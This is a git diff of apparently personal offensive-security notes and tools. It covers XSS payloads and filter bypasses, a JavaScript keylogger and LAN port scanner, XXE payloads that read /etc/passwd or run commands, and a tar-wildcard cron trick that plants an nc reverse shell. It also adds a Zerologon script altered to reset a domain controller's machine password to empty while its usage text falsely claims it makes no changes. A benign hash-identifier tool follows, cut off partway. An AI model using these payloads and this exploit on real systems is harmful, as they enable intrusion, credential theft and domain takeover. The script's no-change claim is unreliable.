|
||||||
|
```
|
||||||
|
* Navigte to `/logs` and take sid
|
||||||
|
|
||||||
|
## Reflected XSS
|
||||||
|
In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
|
||||||
|
|
||||||
|
### Usage
|
||||||
|
As script inside parameter
|
||||||
|
```sh
|
||||||
|
http://example.com/search?keyword=<script>...</script>
|
||||||
|
```
|
||||||
|
* Show server IP
|
||||||
|
```
|
||||||
|
http://example.com/reflected?keyword=<script>alert(window.location.hostname)</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
## DOM based XSS
|
||||||
|
With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:
|
||||||
|
```javascript
|
||||||
|
var keyword = document.querySelector('#search')
|
||||||
|
keyword.innerHTML = <script>...</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Usage
|
||||||
|
* Find the sub-object inside the document
|
||||||
|
```javascript
|
||||||
|
test" onmouseover="alert('YO!')"
|
||||||
|
```
|
||||||
|
* Show cookie
|
||||||
|
```
|
||||||
|
test" onmouseover="alert(document.cookie)"
|
||||||
|
```
|
||||||
|
## Bypass Filters
|
||||||
|
* `<script>` sanitizing
|
||||||
|
```HTML
|
||||||
|
<img src=x onerror=alert('Hello');>
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```javascript
|
||||||
|
<</script>script>alert("1")<</script>/script>
|
||||||
|
```
|
||||||
|
* `alert()` sanitizing
|
||||||
|
```javascript
|
||||||
|
0\"autofocus/onfocus=alert(1)--><onerror=prompt(2)>"-confirm(3)-"
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```javascript
|
||||||
|
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
|
||||||
|
```
|
||||||
|
* Strings, here its `Hello`
|
||||||
|
```javascript
|
||||||
|
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Portscanner via Javascript
|
||||||
|
* By requesting the favicon, checking port 80
|
||||||
|
```javascript
|
||||||
|
<script>
|
||||||
|
for (let i = 0; i < 256; i++) {
|
||||||
|
let ip = '192.168.0.' + i
|
||||||
|
|
||||||
|
let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
|
||||||
|
document.body.innerHTML += code
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
* [pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js)
|
||||||
|
|
||||||
|
|
||||||
|
## Keylogger
|
||||||
|
```javascript
|
||||||
|
<script type="text/javascript">
|
||||||
|
let l = ""; // Variable to store key-strokes in
|
||||||
|
document.onkeypress = function (e) { // Event to listen for key presses
|
||||||
|
l += e.key; // If user types, log it to the l variable
|
||||||
|
console.log(l); // update this line to post to your own server
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Protection Methods
|
||||||
|
|
||||||
|
There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.
|
||||||
|
|
||||||
|
1. Escaping - Escape all user input. This means any data your application has received is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.
|
||||||
|
|
||||||
|
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
|
||||||
|
|
||||||
|
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity <
|
|
@ -0,0 +1,78 @@
|
||||||
|
# XML External Entity (XXE)
|
||||||
|
|
||||||
|
An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.
|
||||||
|
|
||||||
|
There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
|
||||||
|
1. An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.
|
||||||
|
|
||||||
|
2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
|
||||||
|
|
||||||
|
## Document Type Definition (DTD)
|
||||||
|
A DTD defines the structure and the legal elements and attributes of an XML document.
|
||||||
|
|
||||||
|
* Example file content of `note.dtd`
|
||||||
|
```
|
||||||
|
<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>
|
||||||
|
```
|
||||||
|
* !DOCTYPE note - Defines a root element of the document named note
|
||||||
|
* !ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"
|
||||||
|
* !ELEMENT to - Defines the `to` element to be of type "#PCDATA"
|
||||||
|
* !ELEMENT from - Defines the `from` element to be of type "#PCDATA"
|
||||||
|
* !ELEMENT heading - Defines the `heading` element to be of type "#PCDATA"
|
||||||
|
* !ELEMENT body - Defines the `body` element to be of type "#PCDATA"
|
||||||
|
|
||||||
|
|
||||||
|
NOTE: #PCDATA means parseable character data.
|
||||||
|
|
||||||
|
* Resulting XML doc follows
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE note SYSTEM "note.dtd">
|
||||||
|
<note>
|
||||||
|
<to>falcon</to>
|
||||||
|
<from>feast</from>
|
||||||
|
<heading>hacking</heading>
|
||||||
|
<body>XXE attack</body>
|
||||||
|
</note>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Replacing XML content
|
||||||
|
* Name in the example
|
||||||
|
```xml
|
||||||
|
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
|
||||||
|
<userInfo>
|
||||||
|
<firstName>falcon</firstName>
|
||||||
|
<lastName>&name;</lastName>
|
||||||
|
</userInfo>
|
||||||
|
```
|
||||||
|
* System call inside entity
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
|
||||||
|
<root>
|
||||||
|
<name>sdafsa</name>
|
||||||
|
<tel>789731421</tel>
|
||||||
|
<email>&xxe;</email>
|
||||||
|
<password>12345</password>
|
||||||
|
</root>
|
||||||
|
```
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
|
||||||
|
<root>&read;</root>
|
||||||
|
```
|
||||||
|
|
||||||
|
* PHP expect using syscalls
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE foo [ <!ELEMENT foo ANY >
|
||||||
|
<!ENTITY xxe SYSTEM "expect://id" >]>
|
||||||
|
<root>
|
||||||
|
<email>&xxe;</email>
|
||||||
|
<password>12345</password>
|
||||||
|
</root>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe)
|
|
@ -0,0 +1,13 @@
|
||||||
|
# Wildcard usage
|
||||||
|
* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
|
||||||
|
|
||||||
|
## Another Example
|
||||||
|
|
||||||
|
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
|
||||||
|
|
||||||
|
```sh
|
||||||
|
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
|
||||||
|
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
|
||||||
|
touch "/var/www/html/--checkpoint=1"
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,4 @@
|
||||||
|
# Impacket
|
||||||
|
|
||||||
|
* [Repo](https://github.com/SecureAuthCorp/impacket)
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 6da655ca9ac4f9c2a207ea47e79d089044accd78
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 2b944b52ee30f8833a21f0805d2627ca1f15383a
|
|
@ -0,0 +1,57 @@
|
||||||
|
# Zero Logon
|
||||||
|
|
||||||
|
[CVE-2020-1472](http://cve.circl.lu/cve/CVE-2020-1472)
|
||||||
|
|
||||||
|
## MS-NRPC (Microsoft NetLogon Remote Protocol)
|
||||||
|
* ComputeNetlogonCredential
|
||||||
|
* IV is `0` of AES-CFB8
|
||||||
|
* Machine accounts got no limit on failed login attempts (64 bit alnum password)
|
||||||
|
|
||||||
|
## Kill Chain
|
||||||
|
Zero Logon to bypass authentication on the Domain Controller's Machine Account -> Run `Secretsdump.py` to dump credentials -> Crack/Pass Domain Admin Hashes -> ??? -> Profit
|
||||||
|
|
||||||
|
## MS-NRPC Logon
|
||||||
|
* Netlogon handshake between Client (domain-joined computer) and Server (domain-controller).
|
||||||
|
* RPC traffic
|
||||||
|
```mermaid
|
||||||
|
sequenceDiagram
|
||||||
|
participant Client
|
||||||
|
participant Server
|
||||||
|
Client ->> Server: Client challenge
|
||||||
|
Server ->> Client: Server challenge, Session Key = KDF(secret, challenges)
|
||||||
|
Client ->> Server: Client credential, Encrypt(K_sess, client challenge)
|
||||||
|
Server ->> Client: Client credential, Encrypt(K_sess, client challenge)
|
||||||
|
Client ->> Server: Signed + sealed with session key: Procedure call with authenticator
|
||||||
|
```
|
||||||
|
|
||||||
|
* Zero Logon attack. Zeroing parameters and retrying handshakes with an empty password on the domain controller.
|
||||||
|
```mermaid
|
||||||
|
sequenceDiagram
|
||||||
|
participant Client
|
||||||
|
participant Server
|
||||||
|
Client ->> Server: NetrServerReqChallenge (challenge=0000...00)
|
||||||
|
Server ->> Client: Server Challenge
|
||||||
|
Client ->> Server: NetrServerAuthenticate3 (identity=DC; credential=0000...00; sign/seal=0)
|
||||||
|
Server ->> Client: OK
|
||||||
|
Client ->> Server: NetrServerPasswordSet2 (target=DC; authenticator=0000...00; timestamp=0; enc.password=0000...00)
|
||||||
|
```
|
||||||
|
|
||||||
|
1. Client sends 16 Bytes of `0` as Nonce to domain-controller
|
||||||
|
2. Server receives NetServerReqChallenge and generates challenge (Nonce). Sends it to the client.
|
||||||
|
3. __NetrServerAuthenticate3__ method is generated as NetLogon credentials. Contains the following
|
||||||
|
1. __Custom Binding Handle__
|
||||||
|
2. __Account Name__
|
||||||
|
3. __Secure Channel Type__, nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
|
||||||
|
4. __Computer Name__, Domain Controller DC01
|
||||||
|
5. __Client Credential String__, 16 Bytes of `\x00`
|
||||||
|
6. __Negotiation Flags__, value observed from a Win10 client with Sign/Seal flags disabled: 0x212fffff Provided by Secura
|
||||||
|
|
||||||
|
4. NetrServerAuthenticate is received by server. Responds success if positive to the client.
|
||||||
|
5. If same values is calculated by the server, mutual agreement is confirmed by the client as well.
|
||||||
|
|
||||||
|
## PoC
|
||||||
|
* [Secura's PoC](https://github.com/SecuraBV/CVE-2020-1472)
|
||||||
|
* [NetrServerPasswordSet2](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81)
|
||||||
|
* [NetServerAuthenticate3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9)
|
||||||
|
* [Authenticator](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/76c93227-942a-4687-ab9d-9d972ffabdab)
|
||||||
|
* [NETLOGON_CREDENTIALS](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/d55e2632-7163-4f6c-b662-4b870e8cc1cd)
|
|
@ -0,0 +1,100 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
from impacket.dcerpc.v5 import nrpc, epm
|
||||||
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
from impacket.dcerpc.v5 import transport
|
||||||
|
from impacket import crypto
|
||||||
|
|
||||||
|
import hmac, hashlib, struct, sys, socket, time
|
||||||
|
from binascii import hexlify, unhexlify
|
||||||
|
from subprocess import check_call
|
||||||
|
|
||||||
|
# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
|
||||||
|
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
|
||||||
|
|
||||||
|
def fail(msg):
|
||||||
|
print(msg, file=sys.stderr)
|
||||||
|
print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
|
||||||
|
sys.exit(2)
|
||||||
|
|
||||||
|
def try_zero_authenticate(dc_handle, dc_ip, target_computer):
|
||||||
|
# Connect to the DC's Netlogon service.
|
||||||
|
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
|
||||||
|
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
|
||||||
|
rpc_con.connect()
|
||||||
|
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
|
||||||
|
|
||||||
|
# Use an all-zero challenge and credential.
|
||||||
|
plaintext = b'\x00' * 8
|
||||||
|
ciphertext = b'\x00' * 8
|
||||||
|
|
||||||
|
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
|
||||||
|
flags = 0x212fffff
|
||||||
|
|
||||||
|
# Send challenge and authentication request.
|
||||||
|
nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
|
||||||
|
try:
|
||||||
|
server_auth = nrpc.hNetrServerAuthenticate3(
|
||||||
|
rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
|
||||||
|
target_computer + '\x00', ciphertext, flags
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# It worked!
|
||||||
|
assert server_auth['ErrorCode'] == 0
|
||||||
|
# ADDED BY mnemonic_daemon
|
||||||
|
#
|
||||||
|
newPassRequest = nrpc.NetrServerPasswordSet2()
|
||||||
|
newPassRequest['PrimaryName'] = dc_handle + '\x00'
|
||||||
|
newPassRequest['AccountName'] = target_computer + '$\x00'
|
||||||
|
newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
|
||||||
|
auth = nrpc.NETLOGON_AUTHENTICATOR()
|
||||||
|
auth['Credential'] = b'\x00' * 8
|
||||||
|
auth['Timestamp'] = 0
|
||||||
|
newPassRequest['Authenticator'] = auth
|
||||||
|
newPassRequest['ComputerName'] = target_computer + '\x00'
|
||||||
|
newPassRequest['ClearNewPassword'] = b'\x00' * 516
|
||||||
|
rpc_con.request(newPassRequest)
|
||||||
|
return rpc_con
|
||||||
|
|
||||||
|
except nrpc.DCERPCSessionError as ex:
|
||||||
|
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
|
||||||
|
if ex.get_error_code() == 0xc0000022:
|
||||||
|
return None
|
||||||
|
else:
|
||||||
|
fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
|
||||||
|
except BaseException as ex:
|
||||||
|
fail(f'Unexpected error: {ex}.')
|
||||||
|
|
||||||
|
|
||||||
|
def perform_attack(dc_handle, dc_ip, target_computer):
|
||||||
|
# Keep authenticating until succesfull. Expected average number of attempts needed: 256.
|
||||||
|
print('Performing authentication attempts...')
|
||||||
|
rpc_con = None
|
||||||
|
for attempt in range(0, MAX_ATTEMPTS):
|
||||||
|
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
|
||||||
|
|
||||||
|
if rpc_con == None:
|
||||||
|
print('=', end='', flush=True)
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
|
if rpc_con:
|
||||||
|
print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
|
||||||
|
else:
|
||||||
|
print('\nAttack failed. Target is probably patched.')
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
if not (3 <= len(sys.argv) <= 4):
|
||||||
|
print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
|
||||||
|
print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
|
||||||
|
print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
|
||||||
|
sys.exit(1)
|
||||||
|
else:
|
||||||
|
[_, dc_name, dc_ip] = sys.argv
|
||||||
|
|
||||||
|
dc_name = dc_name.rstrip('$')
|
||||||
|
perform_attack('\\\\' + dc_name, dc_ip, dc_name)
|
||||||
|
|
|
@ -0,0 +1,592 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
# encoding: utf-8
|
||||||
|
# Hash Identifier
|
||||||
|
# By Zion3R
|
||||||
|
# www.Blackploit.com
|
||||||
|
# Root@Blackploit.com
|
||||||
|
|
||||||
|
from builtins import input
|
||||||
|
from sys import argv, exit
|
||||||
|
|
||||||
|
version = 1.2
|
||||||
|
|
||||||
|
logo=''' #########################################################################
|
||||||
|
# __ __ __ ______ _____ #
|
||||||
|
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
|
||||||
|
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
|
||||||
|
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
|
||||||
|
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
|
||||||
|
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
|
||||||
|
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' #
|
||||||
|
# By Zion3R #
|
||||||
|
# www.Blackploit.com #
|
||||||
|
# Root@Blackploit.com #
|
||||||
|
#########################################################################'''
|
||||||
|
|
||||||
|
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
|
||||||
|
|
||||||
|
# hash.islower() minusculas
|
||||||
|
# hash.isdigit() numerico
|
||||||
|
# hash.isalpha() letras
|
||||||
|
# hash.isalnum() alfanumerico
|
||||||
|
|
||||||
|
def CRC16(hash):
|
||||||
|
hs='4607'
|
||||||
|
if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("101020")
|
||||||
|
def CRC16CCITT(hash):
|
||||||
|
hs='3d08'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("101040")
|
||||||
|
def FCS16(hash):
|
||||||
|
hs='0e5b'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("101060")
|
||||||
|
|
||||||
|
def CRC32(hash):
|
||||||
|
hs='b33fd057'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("102040")
|
||||||
|
def ADLER32(hash):
|
||||||
|
hs='0607cb42'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("102020")
|
||||||
|
def CRC32B(hash):
|
||||||
|
hs='b764a0d9'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("102060")
|
||||||
|
def XOR32(hash):
|
||||||
|
hs='0000003f'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("102080")
|
||||||
|
|
||||||
|
def GHash323(hash):
|
||||||
|
hs='80000000'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("103040")
|
||||||
|
def GHash325(hash):
|
||||||
|
hs='85318985'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("103020")
|
||||||
|
|
||||||
|
def DESUnix(hash):
|
||||||
|
hs='ZiY8YtDKXJwYQ'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
|
||||||
|
jerar.append("104020")
|
||||||
|
|
||||||
|
def MD5Half(hash):
|
||||||
|
hs='ae11fd697ec92c7c'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("105060")
|
||||||
|
def MD5Middle(hash):
|
||||||
|
hs='7ec92c7c98de3fac'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("105040")
|
||||||
|
def MySQL(hash):
|
||||||
|
hs='63cea4673fd25f46'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("105020")
|
||||||
|
|
||||||
|
def DomainCachedCredentials(hash):
|
||||||
|
hs='f42005ec1afe77967cbc83dce1b4d714'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106025")
|
||||||
|
def Haval128(hash):
|
||||||
|
hs='d6e3ec49aa0f138a619f27609022df10'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106160")
|
||||||
|
def Haval128HMAC(hash):
|
||||||
|
hs='3ce8b0ffd75bc240fc7d967729cd6637'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106165")
|
||||||
|
def MD2(hash):
|
||||||
|
hs='08bbef4754d98806c373f2cd7d9a43c4'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106060")
|
||||||
|
def MD2HMAC(hash):
|
||||||
|
hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106120")
|
||||||
|
def MD4(hash):
|
||||||
|
hs='a2acde400e61410e79dacbdfc3413151'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106040")
|
||||||
|
def MD4HMAC(hash):
|
||||||
|
hs='6be20b66f2211fe937294c1c95d1cd4f'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106100")
|
||||||
|
def MD5(hash):
|
||||||
|
hs='ae11fd697ec92c7c98de3fac23aba525'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106020")
|
||||||
|
def MD5HMAC(hash):
|
||||||
|
hs='d57e43d2c7e397bf788f66541d6fdef9'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106080")
|
||||||
|
def MD5HMACWordpress(hash):
|
||||||
|
hs='3f47886719268dfa83468630948228f6'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106140")
|
||||||
|
def NTLM(hash):
|
||||||
|
hs='cc348bace876ea440a28ddaeb9fd3550'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106029")
|
||||||
|
def RAdminv2x(hash):
|
||||||
|
hs='baea31c728cbf0cd548476aa687add4b'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106027")
|
||||||
|
def RipeMD128(hash):
|
||||||
|
hs='4985351cd74aff0abc5a75a0c8a54115'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106180")
|
||||||
|
def RipeMD128HMAC(hash):
|
||||||
|
hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106185")
|
||||||
|
def SNEFRU128(hash):
|
||||||
|
hs='4fb58702b617ac4f7ca87ec77b93da8a'
|
||||||
|
